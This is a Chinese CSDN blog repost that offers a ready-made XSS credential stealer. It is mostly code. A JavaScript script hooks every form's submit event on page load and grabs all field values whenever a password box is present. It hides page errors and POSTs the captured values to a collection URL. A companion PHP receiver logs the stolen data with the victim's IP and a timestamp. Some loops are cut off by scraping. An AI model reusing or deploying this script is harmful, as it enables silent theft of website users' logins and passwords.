JAVA密码截获_js通用截获form密码代码

最新推荐文章于 2022-04-14 09:47:53 发布
最新推荐文章于 2022-04-14 09:47:53 发布
阅读量183 收藏
点赞数
文章标签: JAVA密码截获
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33970994/article/details/114968257
版权

功能:

(整个表单里如果没找到的框框则不截获,如果找到则截获所有input里的value。)

/***************

通用截获form密码

IE, chrome通过测试

作者 Spider

****************/

function Send_Data(url,ref,datas) {

var xmlhttp = false;

//更高效地获取XMLhttp对象

if(window.XMLHttpRequest) {

xmlhttp = new XMLHttpRequest();

if(xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); }

} else if(window.ActiveXObject) {

var xmlobj = ['Microsoft.XMLHTTP','MSXML.XMLHTTP','Msxml2.XMLHTTP.8.0','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'];

for(var i = 0;i 

}

if(!xmlhttp) { return false; }

//接收截获数据地址(跨域方法百度找)

var sjurl = 'http://localhost/door/get/xss.php';

//$_POST['url']-当前地址,$_POST['ref']-来路,$_POST['data']-截获的数据

var sjpos = 'var=xss&url='+escape(url)+'&ref='+escape(ref)+'&data='+escape(datas);

//POST方法提交数据

xmlhttp.open("POST", sjurl, true);

xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Content-length",sjpos.length);

xmlhttp.setRequestHeader("Connection","close");

xmlhttp.send(sjpos);

return true;

}

function Form_Hijack(thisform) {

var ispwd = false;

//查找form里是否含有输入密码的框框

for(var k = 0;k 

var sjobj = thisform.elements[k]; if(sjobj.type == 'password') { ispwd = true; break; }

}

//如果没有输入密码的框框则不截获

if(!ispwd) { return true; }

var sjurl = window.location;

var sjref = document.referrer;

//如果运行在子窗口

if(window.parent.location) { sjurl = window.parent.location; }

if(top.document.referrer) { sjref = top.document.referrer; }

else if(window.parent.document.referrer) { sjref = window.parent.document.referrer; }

var sjdata = '';

for(var j = 0;j 

var sjobj = thisform.elements[j];

//过滤掉不重要的对象

if(sjobj.type != 'button' && sjobj.type != 'submit' && sjobj.type != 'hidden' && sjobj.type != 'image') {

//框框的名字(name="") 数据(value="")

sjdata += sjobj.name+':'+sjobj.value+' --- ';

}

}

//如果截获成功就发送

if(sjurl && sjdata) { Send_Data(sjurl,sjref,sjdata); }

return true;

}

function Start_Hijack() {

if(document.getElementsByTagName) {

//开始遍历form表单

var sjform = document.getElementsByTagName("form");

//劫持所有form表单的提交事件

for(var i = 0;i 

}

return true;

}

//不显示网页错误

window.onerror = function() { return true; }

//页面加载完毕才开始截获

document.onreadystatechange = function() {

//让子弹飞一会

if(document.readyState == "complete") { setTimeout('Start_Hijack()',1000); }

}

补充:- 低调求发展6 h7 @  G1 |  v8 V- ^% a

记录截获数据php文件

/***************

通用截获form密码 php接收文件

作者 Spider

****************/

error_reporting(E_ERROR);

header("content-Type: text/html; charset=gb2312");

//保存数据的文件

$logfile = './xss.txt';

function filew($filename,$filedata,$filemode) {

$handle = fopen($filename,$filemode);

$key = fputs($handle,$filedata);

fclose($handle);

return $key;

}

function filer($filename,$filesize = 0) {

$filesize = $filesize ? $filesize : filesize($filename);

$handle = fopen($filename,'r');

$filedata = fread($handle,$filesize);

fclose($handle);

return $filedata;

}

function checkgpc($array) {

foreach($array as $key => $var) { $array[$key] = is_array($var) ? checkgpc($var) : stripslashes($var); }

return $array;

}

if(get_magic_quotes_gpc()) { $_POST = checkgpc($_POST); }

if(isset($_POST['url']) && isset($_POST['ref']) && isset($_POST['data'])) {

if(strlen($_POST['url']) > 500 || strlen($_POST['ref']) > 500 || strlen($_POST['data']) > 1000) { exit('数据太大不正常'); }

$temp = filer($logfile);

$data = $_POST['url'].'●'.$_POST['ref'].'●'.$_POST['data'];

//是否重复记录

if(strpos($temp,$data) > -1) { exit('重复记录'); }

//来路IP

$reip = '●'.$_SERVER["REMOTE_ADDR"];

//时间

$time = '●'.date('Y-m-d H:i',time());

filew($logfile,$data.$reip.$time."\r\n",'w');

}

?>

渔舟晚之
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java-实现密码破解
08-06
java-实现密码破解
js通用截获form密码代码
weixin_34138521的博客
03-30 164
2019独角兽企业重金招聘Python工程师标准>>> ...
java能盗号吗_CVE-2017-8759漏洞新利用:Java Keylogger盗号木马分析
weixin_28847323的博客
02-13 616
0×2 木马行为分析 1. 恶意word文档行为分析该恶意word文件中除了一个“链接对象”外,没有其它任何内容。在未修复CVE-2017-8759漏洞的机器上双击打开此word文档时,word程序在解析此“链接对象“时会触发漏洞,从而导致链接对象中的恶意代码下载并执行起来。“链接对象”指向的url为hxxps://a.pomfe.co/sqwkim.png。(文档中的链接对象)(word程序下载...
密码java_java密码代码
weixin_39888412的博客
02-15 132
把下面这个填空填好就好了(带下划线部分)importjava.util.Scanner;publicclassEncryptionFormVI{staticScannerscan=newScanner(System.in);publicstaticintmenu(){//displaysthemen...把下面这个填空填好就好了(带下划线部分)import java.util.Scanner;pu...
如何用java破译密码_passwordcreater.java
weixin_39613433的博客
02-27 791
/*说明:产生下一个密码:使用:每调用一次next()方法,就产生并返回下一个密码的字符串*/public class PasswordCreater{private char password[] = null;private KeyCreater kc[] = null;private int length;//构造初始化属性public PasswordCreater(){this.leng...
系统密码截获代码.rar_Windows 密码_系统密码
最新发布
09-24
标题中的"系统密码截获代码.rar_Windows 密码_系统密码"涉及到的是Windows操作系统中密码获取的技术,特别是通过编程方式来实现对密码框中输入的密码进行截取。这通常涉及到底层系统交互、Windows API调用以及可能...
商业编程-源码-后台密码截获程序源代码.zip
06-23
这个压缩包"商业编程-源码-后台密码截获程序源代码.zip"显然包含了用于理解和分析后台密码截获程序的源代码。这种程序通常涉及到网络安全、数据保护以及密码学相关知识。在这里,我们将深入探讨相关知识点。 1. **...
traceroute.zip_网络截获/分析_Java_
08-12
"网络截获/分析"标签表明这个工具可以捕获并解析网络流量,而"Java"标签则意味着这个程序是用Java编程语言编写的。 在计算机网络中,Traceroute(通常拼写为traceroute)是一个极其重要的诊断工具,它允许用户查看...
Ping.zip_网络截获/分析_Java_
08-12
pinging to find icmp file connection between one pc to another .. once it reaches de distinction it will give u de acknowledgment data.
2.3html_form.zip_钩子与API截获_HTML_
08-11
详细表单,包括编号,用户名,密码,性别,部门,兴趣,说明,注销,重置
Java常用的对密码加密的方法(MD5,SHA)
03-12
博文链接:https://llying.iteye.com/blog/171256
form表单的两种提交方式,submit和button的用法
weixin_34121282的博客
08-22 433
2019独角兽企业重金招聘Python工程师标准>>> ...
python flask 表单数据输出_Flask基础之返回值与form表单提交
weixin_39581571的博客
12-11 1008
1.Python 现阶段三大主流Web框架 Django Tornado Flask 对比Django 主要特点是大而全,集成了很多组件,例如: Models Admin Form 等等, 不管你用得到用不到,反正它全都有,属于全能型框架Django 通常用于大型Web应用由于内置组件足够强大所以使用Django开发可以一气呵成Django 优点是大而全,缺点也就暴露出来了,这么多的资源一次性全部...
6.分页,form组件
bisounie3680的博客
06-28 278
1.分页功能 1.1批量插入数据 # 批量插入数据 book_list = [] for i in range(100): book = Book(title="book_%s"%i,price=i*i,publishDate="2012-12-12",publish_id=1) book_list.append(book) Book.obj...
formform基础、标签渲染、错误显示 重置信息、form属性、局部钩子、全局钩子)...
weixin_34234829的博客
12-17 418
form基础 Django中的Form使用时一般有两种功能: 1、生成html标签 2、验证输入内容 要想使用django提供的form,要在views里导入form模块   from django import forms 首先我们创建我们的模版 <!DOCTYPE html> <html lang="en"> <head> ...
php登录表单验证错误返回,php登录表单 错误消息显示代码
weixin_34183908的博客
03-21 363
php登录表单验证,代码:function validate_user ($username, $password){return true;}// 创建一个空数组存储错误消息$errors = array();$p =& $_POST;if (count ($p) > 0){if (!isset ($p['username']) || (trim ($p['username'])=...
Form表单密码校验
lmf13992427957的博客
04-14 2115
1.在Form表单新建一个密码框 <a-form-item label="密码" v-model:value="value" :labelCol="labelCol" :wrapperCol="wrapperCol"> <a-input-password placeholder="请输入用户密码" v-model="testModel" v-decorator="['password', validatorRules.password]"
ElementUI 表单验证(修改密码)
热门推荐
gs981600308的博客
12-10 1万+
ElementUI 表单验证(修改密码) &lt;el-form :model="resetForm" status-icon :rules="resetFormRules" ref="resetForm" label-width="100px"&gt; &lt;el-form-item label="新密码" prop="newpwd&quot
form表单使用(博客系统的登陆验证,注册)
weixin_34232617的博客
12-31 236
先从小的实例来看form的用法 登陆验证实例,来看form的常规用法 1. forms.py 1 # 用于登陆验证验证 2 from django.core.validators import RegexValidator 支持正则 3 # 登陆验证手动触发错误对象 4 from django.core.exceptions import ValidationError ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值